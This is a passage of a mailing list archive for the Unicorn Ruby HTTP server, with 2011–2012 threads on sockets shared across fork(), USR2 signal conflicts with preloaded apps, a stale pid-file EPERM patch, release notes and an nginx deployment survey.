(I expect ignoring ENOTCONN _once_in_a_while_ will be required,
 but definitely not every request).

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 14a6f9a..bb91e7f 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -537,7 +537,7 @@ class Unicorn::HttpServer
     end
     @request.headers? or headers = nil
     http_response_write(client, status, headers, body)
-    client.shutdown # in case of fork() in Rack app
+    client.close_write # in case of fork() in Rack app
     client.close # flush and uncork socket immediately, no keepalive
   rescue => e
     handle_error(client, e)
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 0%]

* Re: Background jobs with #fork
  2012-04-12 22:41  6%   ` Patrik Wenger
@ 2012-04-12 23:04  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-04-12 23:04 UTC (permalink / raw)
  To: unicorn list; +Cc: Patrik Wenger

Patrik Wenger <paddor@gmail.com> wrote:
> Thanks for the answers.

No problem.

> Isn't there another way to retrieve the right socket?

Actually, I think my proposed patch (in reply to Hongli) at
http://mid.gmane.org/20120412221022.GA20640@dcvr.yhbt.net
should fix your issue.

> > I can probably writeup a better explanation (perhaps on the usp.ruby
> > (Unix Systems Programming for Ruby mailing list) if this doesn't make
> > sense.

> Yeah I don't really understand this part. The "hanging" Unicorn worker
> can read another request because the client socket wasn't closed
> because it's still open in the child process? I would appreciate a
> better explanation, thank you.

Basically, fork() has a similar effect as dup() in that it creates
multiple references to the same kernel object (the client socket).

close() basically lowers the refcount of a kernel object, when the
refcount is zero, resources inside the kernel are freed.  When
the refcount of a kernel object reaches zero, a shutdown(SHUT_RDWR)
is implied.

This works for 99% of Rack apps since they don't fork() nor call dup()
on the client socket, so refcount==1 when unicorn calls close(), leading
to unicorn setting refcount=0 upon close() => everything is freed.

However, since the client socket increments refcount via fork(),
close() in the parent (unicorn worker) no longer implies
shutdown(SHUT_RDWR).



  parent timeline                  | child timeline
  ------------------------------------------------------------------
                                   |
  accept() -> sockfd created       | (child doesn't exist, yet)
  sockfd.refcount == 1             |
                                   |
  fork()                           | child exists, now
                                   |

    sockfd is shared by both processes now: sockfd.refcount == 2
    if either the child or parent forks again: sockfd.recount += 1

                                   |
  close() => sockfd.recount -= 1   | child continues running

    since sockfd.refcount == 1 at this point, the socket is still
    considerd "alive" by the kernel.  If the child calls close()
    (or exits), sockfd.refcount is decremented again (and now
    reaches zero).

Now, to write this as a commit message :>
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Background jobs with #fork
  @ 2012-04-12 22:41  6%   ` Patrik Wenger
  2012-04-12 23:04  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Patrik Wenger @ 2012-04-12 22:41 UTC (permalink / raw)
  To: unicorn list

Thanks for the answers.

> So you're only calling fork and not exec (or system/popen, right?)  It
> may be the case that the client socket is kept alive in the background
> process.

Yes, I'm only calling Kernel#fork. @Eric, your guess makes sense to me.

> The client socket has the close-on-exec flag (FD_CLOEXEC) set, but
> there's no close-on-fork flag, so you might have to find + close it
> yourself.  Here's is a nasty workaround for the child process:
> 
>  ObjectSpace.each_object(Kgio::Socket) do |io|
>    io.close unless io.closed?
>  end

Isn't there another way to retrieve the right socket?

Here some additional info that might bring some clarification.

Another action in the same controller which does about the same regarding the background job works (check.run!).
The only differences I see are:

1) it's called via AJAX
2) the response is nothing (render :nothing => true) instead of a redirect (redirect_to checks_path)

I reckon the second difference kind of confirms Eric's guess, as the client socket probably isn't considered anymore with render :nothing => true.

> However, nginx can still forward subsequent requests to the same unicorn
> (even the same unicorn worker), because as far as the unicorn worker is
> concerned (but not the OS), it's done with the original request.  It's
> just the original request (perhaps the original client) is stuck
> waiting for the background process to finish.
> 
> I can probably writeup a better explanation (perhaps on the usp.ruby
> (Unix Systems Programming for Ruby mailing list) if this doesn't make
> sense.

Yeah I don't really understand this part. The "hanging" Unicorn worker can read another request because the client socket wasn't closed because it's still open in the child process? I would appreciate a better explanation, thank you.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 6%]

* [ANN] unicorn 4.2.1 - minor fix and doc updates
@ 2012-03-26 21:45  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-03-26 21:45 UTC (permalink / raw)
  To: mongrel-unicorn

Changes:

* Stale pid files are detected if a pid is recycled by processes
  belonging to another user, thanks to Graham Bleach.
* nginx example config updates thanks to to Eike Herzbach.
* KNOWN_ISSUES now documents issues with apps/libs that install
  conflicting signal handlers.

* http://unicorn.bogomips.org/
* mongrel-unicorn@rubyforge.org
* git://bogomips.org/unicorn.git
* http://unicorn.bogomips.org/NEWS.atom.xml
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* unicorn 4.2.1 release soon?
@ 2012-03-22  6:30  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-03-22  6:30 UTC (permalink / raw)
  To: mongrel-unicorn

There's not much going on in unicorn.git nowadays, everything's
stabilized nicely over the past few years.

This release would mainly be for for Graham's EPERM fix/workaround for
stale pid files and some documentation fixes improvements.

Shortlog below:

  Eric Wong (4):
        examples/nginx.conf: remove redundant word
        examples/nginx.conf: use $scheme instead of hard-coded "https"
        KNOWN_ISSUES: document signal conflicts in libs/apps
        log EPERM errors from invalid pid files

  Graham Bleach (1):
        Start the server if another user has a PID matching our stale pidfile.

$ git clone git://bogomips.org/unicorn.git


I'm also going on vacation soon, so I'll have almost no Internet access
for a few weeks.  Help each other out when I'm away, thanks :)
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Unicorn_rails ignores USR2 signal
  2012-03-20 23:09  3%                   ` Yeung, Jeffrey
@ 2012-03-21  2:27  0%                     ` Devin Ben-Hur
  0 siblings, 0 replies; 200+ results
From: Devin Ben-Hur @ 2012-03-21  2:27 UTC (permalink / raw)
  To: unicorn list; +Cc: Yeung, Jeffrey

On 3/20/12 4:09 PM, Yeung, Jeffrey wrote:
> I have been unable to narrow down the cause of the conflict so far.  The list of Ruby gems (and gem versions) on the affected deployment are identical to the ones on another deployment where Unicorn is upgrading just fine (with preloaded app).  Grep'ing for USR2 in the gem installations did not reveal anything,  unfortunately.  Since then, I haven't been able to spend further time investigating.  Not sure where else to look, really, but I'm open to further suggestions.

Jeffery,

To uncover the culprit, you might try monkey-patching Kernel.trap and 
Signal.trap so it logs the last few entries in caller when it's called 
with USR2.

Put something like this really early in you app bootstrap:

[Kernel,Signal].each |klass|
   class << klass
     alias :orig_trap :trap
     def trap *args, &block
       if args.first.to_s =~ /USR2$/i || args.first.to_i == 31
         $stderr.puts "Caught someone trapping USR2 caller is:", 
caller.last(2)
       end
       orig_trap *args, &block
     end
   end
end
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* RE: Unicorn_rails ignores USR2 signal
  @ 2012-03-20 23:09  3%                   ` Yeung, Jeffrey
  2012-03-21  2:27  0%                     ` Devin Ben-Hur
  0 siblings, 1 reply; 200+ results
From: Yeung, Jeffrey @ 2012-03-20 23:09 UTC (permalink / raw)
  To: Eric Wong, unicorn list

Eric,

I have been unable to narrow down the cause of the conflict so far.  The list of Ruby gems (and gem versions) on the affected deployment are identical to the ones on another deployment where Unicorn is upgrading just fine (with preloaded app).  Grep'ing for USR2 in the gem installations did not reveal anything,  unfortunately.  Since then, I haven't been able to spend further time investigating.  Not sure where else to look, really, but I'm open to further suggestions.

-Jeff

-----Original Message-----
From: Eric Wong [mailto:normalperson@yhbt.net] 
Sent: Tuesday, March 20, 2012 12:58 PM
To: unicorn list
Cc: Yeung, Jeffrey
Subject: Re: Unicorn_rails ignores USR2 signal

Eric Wong <normalperson@yhbt.net> wrote:
> "Yeung, Jeffrey" <Jeffrey.Yeung@polycom.com> wrote:
> > Sorry for the delay.  It looks like disabling preload_app did the 
> > trick.  A new master was created after sending the USR2.  Now the 
> > $$$ question is, what in the world is intercepting the signal?  :S
> 
> Good to know, I'd just grep the installation directories for all your 
> Ruby libs + gems for USR2.  I haven't seen this problem before, but 
> it'd be good to document the conflict, at least.

Btw, did you ever figure out what was causing the conflict?

Pushing this out to git://bogomips.org/unicorn.git

>From 1e13ffee3469997286e65e0563b6433e7744388a Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Tue, 20 Mar 2012 19:51:35 +0000
Subject: [PATCH] KNOWN_ISSUES: document signal conflicts in libs/apps

Jeffrey Yeung confirmed this issue on the mailing list.

ref: <E8D9E7CCC2621343A0A3BB45E8DEDFA91C682DD23D@CRPMBOXPRD04.polycom.com>
---
 KNOWN_ISSUES |    5 +++++
 1 file changed, 5 insertions(+)

diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES index f323c68..38263e7 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -3,6 +3,11 @@
 Occasionally odd {issues}[link:ISSUES.html] arise without a transparent or  acceptable solution.  Those issues are documented here.
 
+* Some libraries/applications may install signal handlers which 
+conflict
+  with signal handlers unicorn uses.  Leaving "preload_app false"
+  (the default) will allow unicorn to always override existing signal
+  handlers.
+
 * Issues with FreeBSD jails can be worked around as documented by Tatsuya Ono:
   http://mid.gmane.org/CAHBuKRj09FdxAgzsefJWotexw-7JYZGJMtgUp_dhjPz9VbKD6Q@mail.gmail.com
 
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Start the server if another user has a PID matching our stale pidfile.
  2012-02-29 17:25 10% ` Eric Wong
@ 2012-03-20 20:10  9%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-03-20 20:10 UTC (permalink / raw)
  To: unicorn list

Eric Wong <normalperson@yhbt.net> wrote:
> Graham Bleach <graham@darkskills.org.uk> wrote:
> > If unicorn doesn't get terminated cleanly (for example if the machine
> > has its power interrupted) and the pid in the pidfile gets used by
> > another process, the current unicorn code will exit and not start a
> > server. This tiny patch fixes that behaviour.
> 
> Thanks!  Acked-by: Eric Wong <normalperson@yhbt.net>
> 
> and pushed to master on git://bogomips.org/unicorn.git

Btw, I also pushed this to be a little more informative:

>From d0e7d8d770275654024887a05d9e986589ba358c Mon Sep 17 00:00:00 2001
From: Eric Wong <normalperson@yhbt.net>
Date: Tue, 20 Mar 2012 20:05:59 +0000
Subject: [PATCH] log EPERM errors from invalid pid files

In some cases, EPERM may indicate a real configuration problem,
but it can also just mean the pid file is stale.
---
 lib/unicorn/http_server.rb |    5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 0c2af5d..ede6264 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -656,7 +656,10 @@ class Unicorn::HttpServer
     wpid <= 0 and return
     Process.kill(0, wpid)
     wpid
-    rescue Errno::ESRCH, Errno::ENOENT, Errno::EPERM
+    rescue Errno::EPERM
+      logger.info "pid=#{path} possibly stale, got EPERM signalling PID:#{wpid}"
+      nil
+    rescue Errno::ESRCH, Errno::ENOENT
       # don't unlink stale pid files, racy without non-portable locking...
   end
 
-- 
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 9%]

* RE: Unicorn_rails ignores USR2 signal
  2012-03-12 21:21  0%           ` Eric Wong
@ 2012-03-12 22:39  0%             ` Yeung, Jeffrey
    0 siblings, 1 reply; 200+ results
From: Yeung, Jeffrey @ 2012-03-12 22:39 UTC (permalink / raw)
  To: Eric Wong, unicorn list

Hi Eric,

Sorry for the delay.  It looks like disabling preload_app did the trick.  A new master was created after sending the USR2.  Now the $$$ question is, what in the world is intercepting the signal?  :S

And this is a little late now, but here's the strace of a USR2 signal followed by a TTOU signal, with preload_app true (latter signal working okay in this case):

[pid 14542] --- SIGUSR2 (User defined signal 2) @ 0 (0) ---
[pid 14542] rt_sigreturn(0x20)          = 202
[pid 14535] <... select resumed> )      = 0 (Timeout)
[pid 14535] wait4(-1, 0x7fff6bcccb9c, WNOHANG, NULL) = 0
[pid 14535] select(6, [5], NULL, NULL, {60, 0} <unfinished ...>
[pid 14542] --- SIGTTOU (Stopped (tty output)) @ 0 (0) ---
[pid 14542] rt_sigreturn(0x16)          = -1 EINTR (Interrupted system call)
[pid 14553] rt_sigprocmask(SIG_SETMASK, ~[SEGV VTALRM RTMIN RT_1], NULL, 8) = 0
[pid 14553] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[pid 14553] tgkill(14535, 14535, SIGVTALRM) = 0
[pid 14535] <... select resumed> )      = ? ERESTARTNOHAND (To be restarted)
[pid 14535] --- SIGVTALRM (Virtual timer expired) @ 0 (0) ---
[pid 14535] rt_sigreturn(0x1a)          = -1 EINTR (Interrupted system call)
[pid 14535] fcntl(6, F_GETFL)           = 0x1 (flags O_WRONLY)
[pid 14535] fcntl(6, F_SETFL, O_WRONLY|O_NONBLOCK) = 0
[pid 14535] write(6, ".", 1)            = 1
[pid 14535] select(6, [5], NULL, NULL, {59, 939700}) = 1 (in [5], left {59, 939696})
[pid 14535] fcntl(5, F_GETFL)           = 0 (flags O_RDONLY)
[pid 14535] fcntl(5, F_SETFL, O_RDONLY|O_NONBLOCK) = 0
[pid 14535] read(5, ".", 11)            = 1
[pid 14535] wait4(-1, 0x7fff6bcccb9c, WNOHANG, NULL) = 0
[pid 14535] wait4(-1, 0x7fff6bcccb9c, WNOHANG, NULL) = 0
[pid 14535] kill(14552, SIGQUIT)        = 0
[pid 14535] select(6, [5], NULL, NULL, {60, 0} <unfinished ...>
[pid 14542] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 14542] rt_sigreturn(0x11)          = -1 EINTR (Interrupted system call)
[pid 14553] rt_sigprocmask(SIG_SETMASK, ~[SEGV VTALRM RTMIN RT_1], NULL, 8) = 0
[pid 14553] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[pid 14553] tgkill(14535, 14535, SIGVTALRM) = 0
[pid 14535] <... select resumed> )      = ? ERESTARTNOHAND (To be restarted)
[pid 14535] --- SIGVTALRM (Virtual timer expired) @ 0 (0) ---
[pid 14535] rt_sigreturn(0x1a)          = -1 EINTR (Interrupted system call)
[pid 14535] fcntl(6, F_GETFL)           = 0x801 (flags O_WRONLY|O_NONBLOCK)
[pid 14535] write(6, ".", 1)            = 1
[pid 14535] select(6, [5], NULL, NULL, {59, 880004}) = 1 (in [5], left {59, 880001})
[pid 14535] fcntl(5, F_GETFL)           = 0x800 (flags O_RDONLY|O_NONBLOCK)
[pid 14535] read(5, ".", 11)            = 1
[pid 14535] wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], WNOHANG, NULL) = 14552
[pid 14535] write(2, "reaped #<Process::Status: pid 14"..., 53) = 53
[pid 14535] wait4(-1, 0x7fff6bcccb9c, WNOHANG, NULL) = -1 ECHILD (No child processes)
[pid 14535] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[pid 14535] select(6, [5], NULL, NULL, {119, 0}

-----Original Message-----
From: Eric Wong [mailto:normalperson@yhbt.net] 
Sent: Monday, March 12, 2012 2:21 PM
To: unicorn list
Cc: Yeung, Jeffrey
Subject: Re: Unicorn_rails ignores USR2 signal

Eric Wong <normalperson@yhbt.net> wrote:
> However, there's another possibility I hadn't considered, what if you 
> disable preload_app?  Your app or some libs it uses may be 
> intercepting
> USR2 for something it does.

Ping?  Was this it?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Unicorn_rails ignores USR2 signal
  2012-03-10  1:30  5%         ` Eric Wong
@ 2012-03-12 21:21  0%           ` Eric Wong
  2012-03-12 22:39  0%             ` Yeung, Jeffrey
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-03-12 21:21 UTC (permalink / raw)
  To: unicorn list; +Cc: Yeung, Jeffrey

Eric Wong <normalperson@yhbt.net> wrote:
> However, there's another possibility I hadn't considered, what if you
> disable preload_app?  Your app or some libs it uses may be intercepting
> USR2 for something it does.

Ping?  Was this it?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Unicorn_rails ignores USR2 signal
  @ 2012-03-10  1:30  5%         ` Eric Wong
  2012-03-12 21:21  0%           ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-03-10  1:30 UTC (permalink / raw)
  To: unicorn list; +Cc: Yeung, Jeffrey

"Yeung, Jeffrey" <Jeffrey.Yeung@polycom.com> wrote:
> I have it configured for 4 workers.  I just turned it down to 1 worker
> and tested both TTIN and TTOU.  They both work, creating and killing
> workers, respectively.  The following is the strace capture from an
> TTOU signal, followed by a USR2 signal.  Yes, that is the only output
> from the USR2 signal.  Behavior doesn't change if the master is
> freshly started, or has been running for a while.  One other thing I
> did not mention earlier is that the <pid>.oldbin file never gets
> created on the USR2 signal, but that's probably obvious already.

I also asked for sending another signal after USR2, can you try that?

However, there's another possibility I hadn't considered, what if you
disable preload_app?  Your app or some libs it uses may be intercepting
USR2 for something it does.

Maybe this patch can work, but this may also silently break your
application/lib, too...

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 7d2c623..1b9d693 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -128,8 +128,7 @@ class Unicorn::HttpServer
     # setup signal handlers before writing pid file in case people get
     # trigger happy and send signals as soon as the pid file exists.
     # Note that signals don't actually get handled until the #join method
-    QUEUE_SIGS.each { |sig| trap(sig) { SIG_QUEUE << sig; awaken_master } }
-    trap(:CHLD) { awaken_master }
+    master_siginit
     self.pid = config[:pid]
 
     self.master_pid = $$
@@ -689,6 +688,9 @@ class Unicorn::HttpServer
         Gem.refresh
       end
       self.app = app.call
+
+      # override signal handlers the app may have set
+      master_siginit if preload_app
     end
   end
 
@@ -736,4 +738,9 @@ class Unicorn::HttpServer
     config_listeners.each { |addr| listen(addr) }
     raise ArgumentError, "no listeners" if LISTENERS.empty?
   end
+
+  def master_siginit
+    QUEUE_SIGS.each { |sig| trap(sig) { SIG_QUEUE << sig; awaken_master } }
+    trap(:CHLD) { awaken_master }
+  end
 end
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 5%]

* Re: [PATCH] Start the server if another user has a PID matching our stale pidfile.
  2012-02-29 14:34 14% [PATCH] Start the server if another user has a PID matching our stale pidfile Graham Bleach
@ 2012-02-29 17:25 10% ` Eric Wong
  2012-03-20 20:10  9%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-02-29 17:25 UTC (permalink / raw)
  To: unicorn list

Graham Bleach <graham@darkskills.org.uk> wrote:
> If unicorn doesn't get terminated cleanly (for example if the machine
> has its power interrupted) and the pid in the pidfile gets used by
> another process, the current unicorn code will exit and not start a
> server. This tiny patch fixes that behaviour.

Thanks!  Acked-by: Eric Wong <normalperson@yhbt.net>

and pushed to master on git://bogomips.org/unicorn.git
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 10%]

* [PATCH] Start the server if another user has a PID matching our stale pidfile.
@ 2012-02-29 14:34 14% Graham Bleach
  2012-02-29 17:25 10% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Graham Bleach @ 2012-02-29 14:34 UTC (permalink / raw)
  To: mongrel-unicorn

If unicorn doesn't get terminated cleanly (for example if the machine
has its power interrupted) and the pid in the pidfile gets used by
another process, the current unicorn code will exit and not start a
server. This tiny patch fixes that behaviour.


---
 lib/unicorn/http_server.rb |    2 +-
 1 files changed, 1 insertions(+), 1 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 7d2c623..0c2af5d 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -656,7 +656,7 @@ class Unicorn::HttpServer
     wpid <= 0 and return
     Process.kill(0, wpid)
     wpid
-    rescue Errno::ESRCH, Errno::ENOENT
+    rescue Errno::ESRCH, Errno::ENOENT, Errno::EPERM
       # don't unlink stale pid files, racy without non-portable locking...
   end

-- 
1.7.5.4
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 14%]

* Re: Should USR2 always work?
  2011-11-21 23:14  4% Should USR2 always work? Laurens Pit
@ 2011-11-22  1:16  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-11-22  1:16 UTC (permalink / raw)
  To: unicorn list; +Cc: Laurens Pit

Laurens Pit <laurens.pit@mirror42.com> wrote:
> I didn't expect that to be the case, but in the past year occasionally
> I've experienced I had to resort to QUIT and start all over in order
> to get all components loaded correctly.
> 
> Specifically: yesterday I upgraded several projects to rails 3.0.11
> and added a new i18n .yml file in the config dir. After the USR2 QUIT
> sequence all new code seemed to work fine. Except the new .yml file
> wasn't loaded. Another run of USR2 and QUIT didn't resolve it. Only
> after QUIT and start of unicorn was the new .yml file loaded.
> 
> This was not just on one machine, which might have been a fluke. This
> was on all machines for all projects, consistently.
> 
> Any ideas?

Anything from stderr log files?  USR2 will fail if there's

* compile/load error when loading the app (if preload_app=true)

* unicorn/unicorn_rails executable script is missing
  (maybe Bundler is moving it?)

* Ruby installation got moved/shifted/changed

* Working directory got _moved_ (cap may cycle those out)
  You can set "working_directory" in your unicorn config
  to work around it.

  (and maybe other reasons I can't think of right now)

Come to think of it, the missing working directory case
could be the most common...

But stderr log files (stderr_path) should always tell you what's
going on.

== Linux(-only?) tip:

If the log files got deleted somehow, you may still be able to read it
via: "cat /proc/$PID/fd/2" on either the PID of the master or _any_
worker process.

To read some other log files, you can just replace the "2" with whatever
file descriptor.  Reading the symlinks ("ls -l /proc/$PID/fd/") will
tell you where each descriptor is pointed to, even if it is a deleted
file.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Should USR2 always work?
@ 2011-11-21 23:14  4% Laurens Pit
  2011-11-22  1:16  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Laurens Pit @ 2011-11-21 23:14 UTC (permalink / raw)
  To: Unicorn List

Hi,

When deploying new code we go through the USR2 QUIT sequence. This works very nicely and gives zero downtime.

My question is whether there are instances when this sequence is known to not work, and instead you should really send QUIT first and then start all over?

I didn't expect that to be the case, but in the past year occasionally I've experienced I had to resort to QUIT and start all over in order to get all components loaded correctly.

Specifically: yesterday I upgraded several projects to rails 3.0.11 and added a new i18n .yml file in the config dir. After the USR2 QUIT sequence all new code seemed to work fine. Except the new .yml file wasn't loaded. Another run of USR2 and QUIT didn't resolve it. Only after QUIT and start of unicorn was the new .yml file loaded.

This was not just on one machine, which might have been a fluke. This was on all machines for all projects, consistently.

Any ideas?



Cheers,
Lawrence
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: nginx + unicorn deployment survey
  2011-11-14 21:56  4% nginx + unicorn deployment survey Eric Wong
  2011-11-15  2:00  0% ` Jason Su
  2011-11-15  5:07  0% ` Christopher Bailey
@ 2011-11-15 17:47  0% ` Alex Sharp
  2 siblings, 0 replies; 200+ results
From: Alex Sharp @ 2011-11-15 17:47 UTC (permalink / raw)
  To: unicorn list

We run nginx and unicorn on the same instance, behind HAProxy. 

We run it this way because it means fewer instances, and the nginx processes don't seem to require many system resources, so we don't have a resource constraint problem by putting them on the same instance. 

--
Alex Sharp

Zaarly, Inc.
@ajsharp | github.com/ajsharp | alexjsharp.com


On Monday, November 14, 2011 at 1:56 PM, Eric Wong wrote:

> Hello all, I'm wondering if you deploy nginx:
> 
> 1) on the same machine that runs unicorn (exclusively proxying to that)
> 
> 2) on a different machine that doesn't run unicorn
> 
> 3) both, nginx could forward to either to localhost
> or another host on the same LAN
> 
> And of course, the reason(s) you chose what you chose. I'm inclined
> to believe many folks are on 1) simply because they only have one
> machine.
> 
> Thanks in advance for your replies, I'm always interested in
> hearing user experiences with unicorn.



_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: nginx + unicorn deployment survey
  2011-11-14 21:56  4% nginx + unicorn deployment survey Eric Wong
  2011-11-15  2:00  0% ` Jason Su
@ 2011-11-15  5:07  0% ` Christopher Bailey
  2011-11-15 17:47  0% ` Alex Sharp
  2 siblings, 0 replies; 200+ results
From: Christopher Bailey @ 2011-11-15  5:07 UTC (permalink / raw)
  To: unicorn list

We run Nginx+Unicorn on each app server (we have several), and then
have HAProxy in front of the whole thing.  This is basically due to it
being the setup for Engine Yard.

On Mon, Nov 14, 2011 at 1:56 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Hello all, I'm wondering if you deploy nginx:
>
> 1) on the same machine that runs unicorn (exclusively proxying to that)
>
> 2) on a different machine that doesn't run unicorn
>
> 3) both, nginx could forward to either to localhost
>   or another host on the same LAN
>
> And of course, the reason(s) you chose what you chose.  I'm inclined
> to believe many folks are on 1) simply because they only have one
> machine.
>
> Thanks in advance for your replies, I'm always interested in
> hearing user experiences with unicorn.
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying
>



-- 
Christopher Bailey
Cobalt Edge LLC
http://cobaltedge.com
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: nginx + unicorn deployment survey
  2011-11-14 21:56  4% nginx + unicorn deployment survey Eric Wong
@ 2011-11-15  2:00  0% ` Jason Su
  2011-11-15  5:07  0% ` Christopher Bailey
  2011-11-15 17:47  0% ` Alex Sharp
  2 siblings, 0 replies; 200+ results
From: Jason Su @ 2011-11-15  2:00 UTC (permalink / raw)
  To: unicorn list

I have 9 machines each running nginx + unicorn. Maybe that's not the
best setup..

On Mon, Nov 14, 2011 at 1:56 PM, Eric Wong <normalperson@yhbt.net> wrote:
>
> Hello all, I'm wondering if you deploy nginx:
>
> 1) on the same machine that runs unicorn (exclusively proxying to that)
>
> 2) on a different machine that doesn't run unicorn
>
> 3) both, nginx could forward to either to localhost
>   or another host on the same LAN
>
> And of course, the reason(s) you chose what you chose.  I'm inclined
> to believe many folks are on 1) simply because they only have one
> machine.
>
> Thanks in advance for your replies, I'm always interested in
> hearing user experiences with unicorn.
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* nginx + unicorn deployment survey
@ 2011-11-14 21:56  4% Eric Wong
  2011-11-15  2:00  0% ` Jason Su
                   ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Eric Wong @ 2011-11-14 21:56 UTC (permalink / raw)
  To: unicorn list

Hello all, I'm wondering if you deploy nginx:

1) on the same machine that runs unicorn (exclusively proxying to that)

2) on a different machine that doesn't run unicorn

3) both, nginx could forward to either to localhost
   or another host on the same LAN

And of course, the reason(s) you chose what you chose.  I'm inclined
to believe many folks are on 1) simply because they only have one
machine.

Thanks in advance for your replies, I'm always interested in
hearing user experiences with unicorn.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: help with an init script
  @ 2011-11-10 11:20  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
